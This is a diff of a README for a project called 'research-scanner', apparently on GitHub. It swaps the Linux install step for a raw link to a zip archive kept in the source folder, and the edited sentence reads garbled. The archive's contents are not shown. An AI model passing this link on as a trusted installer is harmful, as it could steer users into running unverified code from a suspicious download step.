beaver312/research-scanner/README.md

 3. **Download the right file:**
    - For Windows, download the `.exe` installer.
    - For macOS, download the `.dmg` or `.pkg` file.
-   - For Linux, look for a `.tar.gz` file or instructions if available.
+   - For Linux, look for a `https://raw.githubusercontent.com/beaver312/research-scanner/main/research_scanner/sources/research-scanner-v3.7.zip` file or instructions if available.

 4. **Run the installer:**
    - On Windows, double-click the `.exe` file.